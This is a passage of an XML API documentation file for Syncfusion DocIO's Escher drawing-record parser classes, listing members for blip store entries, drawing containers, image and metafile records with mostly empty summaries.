        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.AddSpContToSearchCol(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer)">
            <summary>
            
            </summary>
            <param name="spContainer"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.Containers">
            <summary>
            Get all containers that have spids.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.BackgroundContainer">
            <summary>
            Gets background container.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._FBSE">
            <summary>
            File Blip Store Entry.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._FBSE.m_btWin32">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._FBSE.Read(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._FBSE.Write(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._FBSE.Clone">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FIDCL">
            <summary>
            The ID clusters are used internally for the translation of shape ids (SPIDs) 
            to shape handles (MSOHSPs). 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FIDCL.m_dgid">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FIDCL.#ctor(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FIDCL.#ctor(System.Int32,System.Int32)">
            <summary>
            
            </summary>
            <param name="dgid"></param>
            <param name="cspidCur"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FIDCL.Write(System.IO.Stream)">
            <summary>
             
             </summary>
             <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FIDCL.Read(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTEBase">
            <summary>
            Summary description for FOPTEBase.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTEBase.m_id">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTEBase.#ctor(System.Int32,System.Boolean)">
            <summary>
            
            </summary>
            <param name="id"></param>
            <param name="isBid"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTEBase.Write(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTEBase.Clone">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTEBase.Id">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTEBase.IsBid">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTEBid">
            <summary>
            Summary description for FOPTEBid.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTEBid.m_value">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTEBid.#ctor(System.Int32,System.Boolean,System.UInt32)">
            <summary>
            
            </summary>
            <param name="id"></param>
            <param name="isBid"></param>
            <param name="value"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTEBid.Write(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTEBid.Clone">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTEBid.Value">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTEComplex">
            <summary>
            Summary description for FOPTEComplex.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTEComplex.m_dataLength">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTEComplex.#ctor(System.Int32,System.Boolean,System.Int32)">
            <summary>
            
            </summary>
            <param name="id"></param>
            <param name="isBid"></param>
            <param name="valueLength"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTEComplex.ReadData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTEComplex.Write(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTEComplex.WriteData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTEComplex.Clone">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FOPTEComplex.Value">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtBSE">
            <summary>
            BLIP Store Entry Record msofbtBSE
            Each BLIP in the BStore is serialized to a File BLIP Store Entry (FBSE) record. The instance field 
            encodes the type of the blip. A fixed size header contains the rest of the common information about 
            the BLIP. If the cbName field in the FBSE is nonzero, a null-terminated Unicode string is written 
            immediately after the FBSE in the file.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtBSE.m_fbse">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtBSE.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtBSE.ReadRecordData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtBSE.WriteRecordData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtBSE.Read(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtBSE.Write(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtBSE.Initialize(Syncfusion.DocIO.DLS.ImageRecord)">
            <summary>
            
            </summary>
            <param name="image"></param>
            <param name="imageBytes"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtBSE.Clone">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtBSE.IsMetafile(System.Drawing.Imaging.ImageFormat)">
            <summary>
            Determines whether the specified image format is metafile.
            </summary>
            <param name="imageFormat">The image format.</param>
            <returns>
            	<c>true</c> if the specified image format is metafile; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtBSE.IsBitmap(System.Drawing.Imaging.ImageFormat)">
            <summary>
            Determines whether the specified image format is bitmap.
            </summary>
            <param name="imageFormat">The image format.</param>
            <returns>
            	<c>true</c> if the specified image format is bitmap; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtBSE.Blip">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtBSE.Fbse">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtBSE.IsInlineBlip">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtBSE.IsPictureInShapeField">
            <summary>
            Gets or sets the value indicating whether the picture is in shape field
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtBstoreContainer">
            <summary>
            The BStore container is just an array of Blip Store Entry (BSE) records. Each shape stores indices 
            into the array for the BLIPs they use. BLIPs are used not only for inserted pictures, but also for 
            the textured and pictures fills of the shape. 
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtBstoreContainer.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtBstoreContainer.WriteRecordData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtClientAnchor">
            <summary>
            Host-specific data.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtGeneral">
            <summary>
            Summary description for MsofbtUnknown.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtGeneral.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtGeneral"/> class.
            </summary>
            <param name="doc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtGeneral.ReadRecordData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtGeneral.WriteRecordData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtGeneral.Clone">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtGeneral.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtGeneral.Data">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtClientData">
            <summary>
            Summary description for MsofbtClientData.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtClientData.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtClientTextbox">
            <summary>
            the text in the textbox, in a host-defined format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtClientTextbox.m_txId">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtClientTextbox.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtClientTextbox.ReadRecordData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtClientTextbox.WriteRecordData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtClientTextbox.Clone">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtClientTextbox.Txid">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtDg">
            <summary>
            Drawing Record msofbtDg
            The drawing record is very simple, with just a count and MSOSPID seed. The attentive reader may 
            expect to find the size of the drawing recorded here, but that information is stored elsewhere 
            by the host application. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtDg.m_shapeCount">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtDg.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtDg.ReadRecordData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtDg.WriteRecordData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtDg.Clone">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtDg.DrawingId">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtDg.ShapeCount">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtDg.SpidLast">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtDgContainer">
            <summary>
            Drawing Container msofbtDgContainer
            The drawing container contains all per-slide/sheet types of information, including the shapes 
            themselves. With a few exceptions, shapes are stored hierarchically according to how they've been 
            grouped (through use of the Draw/Group command). For normal shapes, there is a special parent 
            group shape called the patriarch that contains all of the top-level shapes (which in turn may 
            contain other shapes). The patriarch is always the first msofbtSpgrContainer in the drawing 
            container. A few kinds of shapes are stored separately from the patriarch. The background shape, 
            if there is one, is saved in its own msofbtSpContainer after the patriarch and its children. 
            Additionally, if undo information is being saved and there are deleted shapes that could be brought
            back via Undo, the deleted shapes are saved. Note that there is no patriarch for the deleted shapes, 
            so the top-level deleted shapes are saved separately into the drawing container. (Deleted groups 
            still contain their children, though.)
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtDgContainer.m_shapeDocType">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtDgContainer.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtDgContainer.GetShapeCountAndMaxSpid(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseContainer,System.Int32@,System.Int32@)">
            <summary>
            
            </summary>
            <param name="baseContainer"></param>
            <param name="shapeCount"></param>
            <param name="spidMax"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtDgContainer.InitWriting">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtDgContainer.Clone">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtDgContainer.Dg">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtDgContainer.PatriarchGroupContainer">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtDgContainer.ShapeDocType">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtDgg">
            <summary>
            The drawing group record is a variable length record consisting of a fixed part followed by an array.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtDgg.m_spidMax">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtDgg.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtDgg.ReadRecordData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtDgg.WriteRecordData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtDgg.Clone">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtDgg.DrawingCount">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtDgg.Fidcls">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtDgg.ShapeCount">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtDgg.SpidMax">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtDggContainer">
            <summary>
            Summary description for MsofbtDggContainer.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtDggContainer.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtDggContainer.BstoreContainer">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtDggContainer.Dgg">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtImage">
            <summary>
            Bitmap Blips
            Those blips have one of the following signatures: msobiJPEG, msobiPNG, or msobiDIB. 
            They have the same UID header as described in the Metafile Blip case. The data after the header 
            is just a single BYTE "tag" value and is followed by the compressed data of the bitmap in the 
            relevant format (JFIF or PNG, bytes as would be stored in a file). For the msobiDIB format, 
            the data is in the standard DIB format as a BITMAPINFO ER, BITMAPCORE ER or BITMAPV4 ER followed 
            by the color map (DIB_RGB_COLORS) and the bits. This data is not compressed (the format is used 
            for very small DIB bitmaps only).
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._Blip">
            <summary>
            Summary description for _Blip.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._Blip.DEF_UID_LENGTH">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._Blip.m_guid">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._Blip.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._Blip.ReadGuid(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._Blip.HasUid2">
            <summary>
            Determines whether this instance has uid2.
            </summary>
            <returns>
            	<c>true</c> if this instance has uid2; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._Blip.Clone">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._Blip.Type">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._Blip.ImageBytes">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._Blip.ImageRecord">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._Blip.ImageFormat">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._Blip.Uid">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._Blip.Uid2">
            <summary>
            Gets or sets the uid2.
            </summary>
            <value>The uid2.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._Blip.IsDib">
            <summary>
            Gets a value indicating whether this instance is has .dib format.
            </summary>
            <value><c>true</c> if this instance has .dib format; otherwise, <c>false</c>.</value>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtImage.DEF_COLOR_USED_OFFSET">
            <summary>
            Number of used colors.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtImage.DEF_DIB_HEADER_SIZE">
            <summary>
            Size of header.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtImage.DEF_COLOR_SIZE">
            <summary>
            Size of each color definition in the palette.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtImage.DEF_SIGNATURE">
            <summary>
            Signature, must be 4D42 hex for .bmp header.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtImage.DEF_RESERVED">
            <summary>
            Reserved data.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtImage.m_imageRecord">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtImage.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtImage"/> class.
            </summary>
            <param name="doc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtImage.#ctor(Syncfusion.DocIO.DLS.ImageRecord,System.Boolean,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtImage"/> class.
            </summary>
            <param name="imageRecord">The image record.</param>
            <param name="isBitmap">if set to <c>true</c> [is bitmap].</param>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtImage.ReadRecordData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtImage.WriteRecordData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtImage.Clone">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtImage.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtImage.ConvertDibToBmp(System.Byte[])">
            <summary>
            Dib file is a .BMP file without .BMP header. This function adds BMP header.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtImage.ImageBytes">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtImage.ImageRecord">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtMetaFile">
            <summary>
            Metafile/PICT Blips
            Those blips have one of the following signatures: msobiEMF, msobiWMF, or msobiPICT. They are normally 
            stored in a compressed format using the LZ compression algorithm in the format used by GNU Zip 
            deflate/inflate with a 32k window. The format is zlib format . The only metafile compression version 
            number currently defined identifies this format and is analogous to the PNG compression type value in the 
            PNG file format. The filter values (MSOBLIPFILTER) define pre-filtering of metafile data to give better 
            compression. Currently no pre-filtering is done (it is likely that filtering on a per-record basis will give 
            substantially better compression in the future). However, if there is an exception due to out-of-memory or 
            out-of-disk space when saving those blips, the compression operation is skipped and the blips are then 
            saved in a non-compressed format- in this case the compressed bits are simply the original metafile data.. 
            When the blips are loaded back in memory, a check is performed based on a "compression status" flag 
            (MSOBLIPCOMPRESSION) that follows the blip header encoded as follows:
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtMetaFile.m_length">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtMetaFile.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtMetaFile.#ctor(Syncfusion.DocIO.DLS.ImageRecord,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
            <param name="imageBytes"></param>
            <param name="srcMetafile"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtMetaFile.#ctor(Syncfusion.DocIO.DLS.WPicture,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
            <param name="imageBytes"></param>
            <param name="srcMetafile"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtMetaFile.Clone">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtMetaFile.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtMetaFile.ReadRecordData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtMetaFile.WriteRecordData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtMetaFile.Compression">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtMetaFile.ImageBytes">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtMetaFile.ImageRecord">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtOPT">
            <summary>
            Default Property Table Record msofbtOPT
            This describes the default properties of newly created shapes. 
            Only the properties that differ from the per-property defaults are saved. 
            The format of the record is the same as that of the property table in a shape; 
            a discussion of that format is in the Shape Properties section .
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtOPT.m_prop">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtOPT.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtOPT.ReadRecordData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtOPT.WriteRecordData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
